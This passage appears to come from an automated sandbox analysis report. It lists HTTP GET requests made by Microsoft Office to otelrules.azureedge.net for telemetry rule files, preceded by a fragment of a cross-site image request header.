image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://trksyln.net/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /rules/other-Win32-v19.bundle HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120608v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120609v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule224902v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120600v4s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120402v21s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120612v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120613v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120610v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120614v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120611v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120615v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120619v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120617v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120616v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120618v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120624v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120623v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120620v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120622v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120621v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120626v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120625v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120629v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120627v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120628v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120630v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120631v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120634v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120633v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120632v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120635v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120636v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120637v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120638v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120639v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120644v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120643v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120642v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120640v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120641v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120645v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120647v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120648v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120646v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120649v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120650v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120653v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120651v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120652v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120654v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120655v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120656v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120657v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120659v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120658v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120661v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120660v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120662v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120663v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120664v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120665v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120666v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120667v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120668v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120669v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120671v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120670v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120672v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120673v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120674v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120675v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120676v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120677v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120678v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120679v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120680v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120681v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120602v10s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120682v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120601v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule224901v11s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700401v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700400v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703900v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703901v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702800v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703351v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702801v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703350v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703501v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703500v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701801v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701800v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
